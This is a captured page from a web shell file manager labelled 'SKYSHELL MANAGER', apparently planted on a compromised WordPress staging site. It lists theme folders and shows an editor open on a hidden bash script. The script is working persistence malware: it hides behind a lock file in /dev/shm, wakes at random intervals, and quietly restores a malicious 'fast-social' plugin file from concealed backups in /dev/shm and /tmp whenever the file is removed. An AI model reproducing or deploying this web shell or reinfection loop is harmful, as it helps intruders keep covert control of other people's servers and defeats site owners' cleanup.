📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: .11e306aa
#!/bin/bash L='/dev/shm/.11e306aa.lock' exec 200>"$L" && flock -n 200 || exit 0 B1='/dev/shm/.fast-social.php' B2='/tmp/.fast-social.php' SELF='/home/usatggfa/formationsadvice.com/wp-content/plugins/fast-social/fast-social.php' while :; do sleep $((1500 + RANDOM % 600)) if [ ! -f "$SELF" ]; then for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done fi [ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null [ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null done
Save